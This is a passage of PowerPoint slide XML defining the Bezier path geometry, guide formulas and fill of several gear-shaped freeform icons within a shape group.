                <a:gd name="T43" fmla="*/ 643 h 716"/>
                <a:gd name="T44" fmla="*/ 330 w 717"/>
                <a:gd name="T45" fmla="*/ 710 h 716"/>
                <a:gd name="T46" fmla="*/ 437 w 717"/>
                <a:gd name="T47" fmla="*/ 642 h 716"/>
                <a:gd name="T48" fmla="*/ 459 w 717"/>
                <a:gd name="T49" fmla="*/ 635 h 716"/>
                <a:gd name="T50" fmla="*/ 587 w 717"/>
                <a:gd name="T51" fmla="*/ 628 h 716"/>
                <a:gd name="T52" fmla="*/ 570 w 717"/>
                <a:gd name="T53" fmla="*/ 563 h 716"/>
                <a:gd name="T54" fmla="*/ 649 w 717"/>
                <a:gd name="T55" fmla="*/ 560 h 716"/>
                <a:gd name="T56" fmla="*/ 644 w 717"/>
                <a:gd name="T57" fmla="*/ 433 h 716"/>
                <a:gd name="T58" fmla="*/ 648 w 717"/>
                <a:gd name="T59" fmla="*/ 412 h 716"/>
                <a:gd name="T60" fmla="*/ 357 w 717"/>
                <a:gd name="T61" fmla="*/ 586 h 716"/>
                <a:gd name="T62" fmla="*/ 357 w 717"/>
                <a:gd name="T63" fmla="*/ 130 h 716"/>
                <a:gd name="T64" fmla="*/ 357 w 717"/>
                <a:gd name="T65" fmla="*/ 586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17" h="716">
                  <a:moveTo>
                    <a:pt x="711" y="386"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="717" y="338"/>
                    <a:pt x="707" y="298"/>
                    <a:pt x="707" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="643" y="279"/>
                    <a:pt x="643" y="279"/>
                    <a:pt x="643" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="643" y="280"/>
                    <a:pt x="643" y="280"/>
                    <a:pt x="643" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="641" y="272"/>
                    <a:pt x="638" y="265"/>
                    <a:pt x="636" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="677" y="204"/>
                    <a:pt x="677" y="204"/>
                    <a:pt x="677" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="658" y="159"/>
                    <a:pt x="628" y="129"/>
                    <a:pt x="628" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="146"/>
                    <a:pt x="564" y="146"/>
                    <a:pt x="564" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="147"/>
                    <a:pt x="564" y="147"/>
                    <a:pt x="564" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="559" y="142"/>
                    <a:pt x="555" y="139"/>
                    <a:pt x="551" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="68"/>
                    <a:pt x="560" y="68"/>
                    <a:pt x="560" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="522" y="38"/>
                    <a:pt x="482" y="26"/>
                    <a:pt x="482" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="73"/>
                    <a:pt x="434" y="73"/>
                    <a:pt x="434" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="73"/>
                    <a:pt x="434" y="73"/>
                    <a:pt x="434" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="71"/>
                    <a:pt x="420" y="70"/>
                    <a:pt x="412" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="6"/>
                    <a:pt x="387" y="6"/>
                    <a:pt x="387" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="0"/>
                    <a:pt x="298" y="10"/>
                    <a:pt x="298" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="74"/>
                    <a:pt x="280" y="74"/>
                    <a:pt x="280" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="74"/>
                    <a:pt x="280" y="74"/>
                    <a:pt x="280" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="76"/>
                    <a:pt x="265" y="78"/>
                    <a:pt x="258" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="40"/>
                    <a:pt x="204" y="40"/>
                    <a:pt x="204" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="59"/>
                    <a:pt x="130" y="88"/>
                    <a:pt x="130" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="153"/>
                    <a:pt x="147" y="153"/>
                    <a:pt x="147" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="153"/>
                    <a:pt x="147" y="153"/>
                    <a:pt x="147" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="157"/>
                    <a:pt x="139" y="161"/>
                    <a:pt x="135" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="156"/>
                    <a:pt x="68" y="156"/>
                    <a:pt x="68" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="195"/>
                    <a:pt x="27" y="235"/>
                    <a:pt x="27" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="283"/>
                    <a:pt x="73" y="283"/>
                    <a:pt x="73" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="283"/>
                    <a:pt x="74" y="283"/>
                    <a:pt x="74" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="290"/>
                    <a:pt x="70" y="297"/>
                    <a:pt x="69" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="330"/>
                    <a:pt x="6" y="330"/>
                    <a:pt x="6" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="378"/>
                    <a:pt x="10" y="418"/>
                    <a:pt x="10" y="418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="437"/>
                    <a:pt x="75" y="437"/>
                    <a:pt x="75" y="437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="436"/>
                    <a:pt x="75" y="436"/>
                    <a:pt x="75" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="444"/>
                    <a:pt x="79" y="451"/>
                    <a:pt x="82" y="459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="512"/>
                    <a:pt x="41" y="512"/>
                    <a:pt x="41" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="557"/>
                    <a:pt x="89" y="587"/>
                    <a:pt x="89" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="570"/>
                    <a:pt x="154" y="570"/>
                    <a:pt x="154" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="569"/>
                    <a:pt x="154" y="569"/>
                    <a:pt x="154" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="574"/>
                    <a:pt x="162" y="577"/>
                    <a:pt x="166" y="581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="648"/>
                    <a:pt x="157" y="648"/>
                    <a:pt x="157" y="648"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="678"/>
                    <a:pt x="236" y="689"/>
                    <a:pt x="236" y="689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="643"/>
                    <a:pt x="284" y="643"/>
                    <a:pt x="284" y="643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="643"/>
                    <a:pt x="284" y="643"/>
                    <a:pt x="284" y="643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="645"/>
                    <a:pt x="298" y="646"/>
                    <a:pt x="305" y="648"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="710"/>
                    <a:pt x="330" y="710"/>
                    <a:pt x="330" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="716"/>
                    <a:pt x="419" y="706"/>
                    <a:pt x="419" y="706"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="642"/>
                    <a:pt x="437" y="642"/>
                    <a:pt x="437" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="642"/>
                    <a:pt x="437" y="642"/>
                    <a:pt x="437" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="640"/>
                    <a:pt x="452" y="638"/>
                    <a:pt x="459" y="635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="513" y="676"/>
                    <a:pt x="513" y="676"/>
                    <a:pt x="513" y="676"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="657"/>
                    <a:pt x="587" y="628"/>
                    <a:pt x="587" y="628"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="563"/>
                    <a:pt x="570" y="563"/>
                    <a:pt x="570" y="563"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="563"/>
                    <a:pt x="570" y="563"/>
                    <a:pt x="570" y="563"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="574" y="559"/>
                    <a:pt x="578" y="555"/>
                    <a:pt x="582" y="550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="649" y="560"/>
                    <a:pt x="649" y="560"/>
                    <a:pt x="649" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="678" y="521"/>
                    <a:pt x="690" y="481"/>
                    <a:pt x="690" y="481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="644" y="433"/>
                    <a:pt x="644" y="433"/>
                    <a:pt x="644" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="643" y="433"/>
                    <a:pt x="643" y="433"/>
                    <a:pt x="643" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="645" y="426"/>
                    <a:pt x="647" y="419"/>
                    <a:pt x="648" y="412"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="711" y="386"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="357" y="586"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="586"/>
                    <a:pt x="129" y="484"/>
                    <a:pt x="129" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="232"/>
                    <a:pt x="231" y="130"/>
                    <a:pt x="357" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="484" y="130"/>
                    <a:pt x="586" y="232"/>
                    <a:pt x="586" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="586" y="484"/>
                    <a:pt x="484" y="586"/>
                    <a:pt x="357" y="5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BDF09EF2-F55A-4556-9E26-0729B9312E0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9442049" y="2293486"/>
              <a:ext cx="591839" cy="452356"/>
              <a:chOff x="6654912" y="2293486"/>
              <a:chExt cx="591839" cy="452356"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Freeform 126">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8DC122E-0142-4680-8464-84FC274B2C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80705" y="2293486"/>
                <a:ext cx="366046" cy="366046"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 197 w 201"/>
                  <a:gd name="T1" fmla="*/ 74 h 201"/>
                  <a:gd name="T2" fmla="*/ 179 w 201"/>
                  <a:gd name="T3" fmla="*/ 71 h 201"/>
                  <a:gd name="T4" fmla="*/ 186 w 201"/>
                  <a:gd name="T5" fmla="*/ 49 h 201"/>
                  <a:gd name="T6" fmla="*/ 146 w 201"/>
                  <a:gd name="T7" fmla="*/ 35 h 201"/>
                  <a:gd name="T8" fmla="*/ 146 w 201"/>
                  <a:gd name="T9" fmla="*/ 32 h 201"/>
                  <a:gd name="T10" fmla="*/ 126 w 201"/>
                  <a:gd name="T11" fmla="*/ 4 h 201"/>
                  <a:gd name="T12" fmla="*/ 114 w 201"/>
                  <a:gd name="T13" fmla="*/ 18 h 201"/>
                  <a:gd name="T14" fmla="*/ 100 w 201"/>
                  <a:gd name="T15" fmla="*/ 0 h 201"/>
                  <a:gd name="T16" fmla="*/ 71 w 201"/>
                  <a:gd name="T17" fmla="*/ 22 h 201"/>
                  <a:gd name="T18" fmla="*/ 65 w 201"/>
                  <a:gd name="T19" fmla="*/ 25 h 201"/>
                  <a:gd name="T20" fmla="*/ 29 w 201"/>
                  <a:gd name="T21" fmla="*/ 30 h 201"/>
                  <a:gd name="T22" fmla="*/ 36 w 201"/>
                  <a:gd name="T23" fmla="*/ 48 h 201"/>
                  <a:gd name="T24" fmla="*/ 14 w 201"/>
                  <a:gd name="T25" fmla="*/ 51 h 201"/>
                  <a:gd name="T26" fmla="*/ 18 w 201"/>
                  <a:gd name="T27" fmla="*/ 86 h 201"/>
                  <a:gd name="T28" fmla="*/ 18 w 201"/>
                  <a:gd name="T29" fmla="*/ 92 h 201"/>
                  <a:gd name="T30" fmla="*/ 4 w 201"/>
                  <a:gd name="T31" fmla="*/ 126 h 201"/>
                  <a:gd name="T32" fmla="*/ 23 w 201"/>
                  <a:gd name="T33" fmla="*/ 129 h 201"/>
                  <a:gd name="T34" fmla="*/ 15 w 201"/>
                  <a:gd name="T35" fmla="*/ 152 h 201"/>
                  <a:gd name="T36" fmla="*/ 42 w 201"/>
                  <a:gd name="T37" fmla="*/ 165 h 201"/>
                  <a:gd name="T38" fmla="*/ 49 w 201"/>
                  <a:gd name="T39" fmla="*/ 168 h 201"/>
                  <a:gd name="T40" fmla="*/ 74 w 201"/>
                  <a:gd name="T41" fmla="*/ 197 h 201"/>
                  <a:gd name="T42" fmla="*/ 87 w 201"/>
                  <a:gd name="T43" fmla="*/ 182 h 201"/>
                  <a:gd name="T44" fmla="*/ 102 w 201"/>
                  <a:gd name="T45" fmla="*/ 200 h 201"/>
                  <a:gd name="T46" fmla="*/ 130 w 201"/>
                  <a:gd name="T47" fmla="*/ 178 h 201"/>
                  <a:gd name="T48" fmla="*/ 136 w 201"/>
                  <a:gd name="T49" fmla="*/ 176 h 201"/>
                  <a:gd name="T50" fmla="*/ 172 w 201"/>
                  <a:gd name="T51" fmla="*/ 168 h 201"/>
                  <a:gd name="T52" fmla="*/ 166 w 201"/>
                  <a:gd name="T53" fmla="*/ 147 h 201"/>
                  <a:gd name="T54" fmla="*/ 188 w 201"/>
                  <a:gd name="T55" fmla="*/ 148 h 201"/>
                  <a:gd name="T56" fmla="*/ 183 w 201"/>
                  <a:gd name="T57" fmla="*/ 114 h 201"/>
                  <a:gd name="T58" fmla="*/ 184 w 201"/>
                  <a:gd name="T59" fmla="*/ 108 h 201"/>
                  <a:gd name="T60" fmla="*/ 101 w 201"/>
                  <a:gd name="T61" fmla="*/ 142 h 201"/>
                  <a:gd name="T62" fmla="*/ 101 w 201"/>
                  <a:gd name="T63" fmla="*/ 58 h 201"/>
                  <a:gd name="T64" fmla="*/ 101 w 201"/>
                  <a:gd name="T65" fmla="*/ 142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1" h="201">
                    <a:moveTo>
                      <a:pt x="201" y="99"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="85"/>
                      <a:pt x="197" y="74"/>
                      <a:pt x="197" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="71"/>
                      <a:pt x="179" y="71"/>
                      <a:pt x="179" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="71"/>
                      <a:pt x="179" y="71"/>
                      <a:pt x="179" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="69"/>
                      <a:pt x="177" y="67"/>
                      <a:pt x="176" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="49"/>
                      <a:pt x="186" y="49"/>
                      <a:pt x="186" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180" y="36"/>
                      <a:pt x="167" y="29"/>
                      <a:pt x="167" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="35"/>
                      <a:pt x="146" y="35"/>
                      <a:pt x="146" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="35"/>
                      <a:pt x="146" y="35"/>
                      <a:pt x="146" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="34"/>
                      <a:pt x="147" y="33"/>
                      <a:pt x="146" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="13"/>
                      <a:pt x="148" y="13"/>
                      <a:pt x="148" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="6"/>
                      <a:pt x="126" y="4"/>
                      <a:pt x="126" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="18"/>
                      <a:pt x="114" y="18"/>
                      <a:pt x="114" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="18"/>
                      <a:pt x="114" y="18"/>
                      <a:pt x="114" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="18"/>
                      <a:pt x="110" y="17"/>
                      <a:pt x="108" y="17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86" y="0"/>
                      <a:pt x="75" y="3"/>
                      <a:pt x="75" y="3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69" y="23"/>
                      <a:pt x="67" y="24"/>
                      <a:pt x="65" y="25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37" y="21"/>
                      <a:pt x="29" y="30"/>
                      <a:pt x="29" y="30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5" y="49"/>
                      <a:pt x="34" y="50"/>
                      <a:pt x="33" y="52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6" y="62"/>
                      <a:pt x="4" y="74"/>
                      <a:pt x="4" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="86"/>
                      <a:pt x="18" y="86"/>
                      <a:pt x="18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8" y="88"/>
                      <a:pt x="18" y="90"/>
                      <a:pt x="18" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="101"/>
                      <a:pt x="1" y="101"/>
                      <a:pt x="1" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="115"/>
                      <a:pt x="4" y="126"/>
                      <a:pt x="4" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="129"/>
                      <a:pt x="23" y="129"/>
                      <a:pt x="23" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="129"/>
                      <a:pt x="23" y="129"/>
                      <a:pt x="23" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="131"/>
                      <a:pt x="24" y="133"/>
                      <a:pt x="25" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="152"/>
                      <a:pt x="15" y="152"/>
                      <a:pt x="15" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="164"/>
                      <a:pt x="27" y="171"/>
                      <a:pt x="27" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="165"/>
                      <a:pt x="42" y="165"/>
                      <a:pt x="42" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="165"/>
                      <a:pt x="42" y="165"/>
                      <a:pt x="42" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="166"/>
                      <a:pt x="48" y="167"/>
                      <a:pt x="49" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="187"/>
                      <a:pt x="50" y="187"/>
                      <a:pt x="50" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="194"/>
                      <a:pt x="74" y="197"/>
                      <a:pt x="74" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="182"/>
                      <a:pt x="86" y="182"/>
                      <a:pt x="86" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="183"/>
                      <a:pt x="91" y="183"/>
                      <a:pt x="93" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="200"/>
                      <a:pt x="102" y="200"/>
                      <a:pt x="102" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="201"/>
                      <a:pt x="127" y="197"/>
                      <a:pt x="127" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="178"/>
                      <a:pt x="130" y="178"/>
                      <a:pt x="130" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="178"/>
                      <a:pt x="130" y="178"/>
                      <a:pt x="130" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="177"/>
                      <a:pt x="134" y="176"/>
                      <a:pt x="136" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="152" y="186"/>
                      <a:pt x="152" y="186"/>
                      <a:pt x="152" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="179"/>
                      <a:pt x="172" y="168"/>
                      <a:pt x="172" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="147"/>
                      <a:pt x="166" y="147"/>
                      <a:pt x="166" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="147"/>
                      <a:pt x="166" y="147"/>
                      <a:pt x="166" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="147"/>
                      <a:pt x="168" y="147"/>
                      <a:pt x="169" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="148"/>
                      <a:pt x="188" y="148"/>
                      <a:pt x="188" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="137"/>
                      <a:pt x="197" y="126"/>
                      <a:pt x="197" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="114"/>
                      <a:pt x="183" y="114"/>
                      <a:pt x="183" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="114"/>
                      <a:pt x="183" y="114"/>
                      <a:pt x="183" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="112"/>
                      <a:pt x="184" y="110"/>
                      <a:pt x="184" y="108"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="201" y="99"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="101" y="142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="142"/>
                      <a:pt x="58" y="123"/>
                      <a:pt x="58" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="77"/>
                      <a:pt x="77" y="58"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="58"/>
                      <a:pt x="143" y="77"/>
                      <a:pt x="143" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="123"/>
                      <a:pt x="124" y="142"/>
                      <a:pt x="101" y="1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41" name="Freeform 127">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D94D18-E82B-4D6C-8463-33D0C28209A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54912" y="2488454"/>
                <a:ext cx="256618" cy="257388"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 138 w 141"/>
                  <a:gd name="T1" fmla="*/ 52 h 141"/>
                  <a:gd name="T2" fmla="*/ 125 w 141"/>
                  <a:gd name="T3" fmla="*/ 50 h 141"/>
                  <a:gd name="T4" fmla="*/ 131 w 141"/>
                  <a:gd name="T5" fmla="*/ 34 h 141"/>
                  <a:gd name="T6" fmla="*/ 110 w 141"/>
                  <a:gd name="T7" fmla="*/ 25 h 141"/>
                  <a:gd name="T8" fmla="*/ 106 w 141"/>
                  <a:gd name="T9" fmla="*/ 23 h 141"/>
                  <a:gd name="T10" fmla="*/ 89 w 141"/>
                  <a:gd name="T11" fmla="*/ 2 h 141"/>
                  <a:gd name="T12" fmla="*/ 80 w 141"/>
                  <a:gd name="T13" fmla="*/ 13 h 141"/>
                  <a:gd name="T14" fmla="*/ 70 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 141"/>
                  <a:gd name="T16" fmla="*/ 50 w 141"/>
                  <a:gd name="T17" fmla="*/ 15 h 141"/>
                  <a:gd name="T18" fmla="*/ 45 w 141"/>
                  <a:gd name="T19" fmla="*/ 17 h 141"/>
                  <a:gd name="T20" fmla="*/ 20 w 141"/>
                  <a:gd name="T21" fmla="*/ 21 h 141"/>
                  <a:gd name="T22" fmla="*/ 25 w 141"/>
                  <a:gd name="T23" fmla="*/ 33 h 141"/>
                  <a:gd name="T24" fmla="*/ 9 w 141"/>
                  <a:gd name="T25" fmla="*/ 36 h 141"/>
                  <a:gd name="T26" fmla="*/ 12 w 141"/>
                  <a:gd name="T27" fmla="*/ 61 h 141"/>
                  <a:gd name="T28" fmla="*/ 12 w 141"/>
                  <a:gd name="T29" fmla="*/ 65 h 141"/>
                  <a:gd name="T30" fmla="*/ 2 w 141"/>
                  <a:gd name="T31" fmla="*/ 88 h 141"/>
                  <a:gd name="T32" fmla="*/ 15 w 141"/>
                  <a:gd name="T33" fmla="*/ 91 h 141"/>
                  <a:gd name="T34" fmla="*/ 10 w 141"/>
                  <a:gd name="T35" fmla="*/ 106 h 141"/>
                  <a:gd name="T36" fmla="*/ 34 w 141"/>
                  <a:gd name="T37" fmla="*/ 116 h 141"/>
                  <a:gd name="T38" fmla="*/ 37 w 141"/>
                  <a:gd name="T39" fmla="*/ 118 h 141"/>
                  <a:gd name="T40" fmla="*/ 53 w 141"/>
                  <a:gd name="T41" fmla="*/ 138 h 141"/>
                  <a:gd name="T42" fmla="*/ 62 w 141"/>
                  <a:gd name="T43" fmla="*/ 128 h 141"/>
                  <a:gd name="T44" fmla="*/ 71 w 141"/>
                  <a:gd name="T45" fmla="*/ 141 h 141"/>
                  <a:gd name="T46" fmla="*/ 91 w 141"/>
                  <a:gd name="T47" fmla="*/ 125 h 141"/>
                  <a:gd name="T48" fmla="*/ 95 w 141"/>
                  <a:gd name="T49" fmla="*/ 123 h 141"/>
                  <a:gd name="T50" fmla="*/ 120 w 141"/>
                  <a:gd name="T51" fmla="*/ 118 h 141"/>
                  <a:gd name="T52" fmla="*/ 116 w 141"/>
                  <a:gd name="T53" fmla="*/ 104 h 141"/>
                  <a:gd name="T54" fmla="*/ 131 w 141"/>
                  <a:gd name="T55" fmla="*/ 104 h 141"/>
                  <a:gd name="T56" fmla="*/ 128 w 141"/>
                  <a:gd name="T57" fmla="*/ 80 h 141"/>
                  <a:gd name="T58" fmla="*/ 129 w 141"/>
                  <a:gd name="T59" fmla="*/ 76 h 141"/>
                  <a:gd name="T60" fmla="*/ 70 w 141"/>
                  <a:gd name="T61" fmla="*/ 100 h 141"/>
                  <a:gd name="T62" fmla="*/ 70 w 141"/>
                  <a:gd name="T63" fmla="*/ 41 h 141"/>
                  <a:gd name="T64" fmla="*/ 70 w 141"/>
                  <a:gd name="T65" fmla="*/ 10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1" h="141">
                    <a:moveTo>
                      <a:pt x="141" y="70"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="60"/>
                      <a:pt x="138" y="52"/>
                      <a:pt x="138" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="50"/>
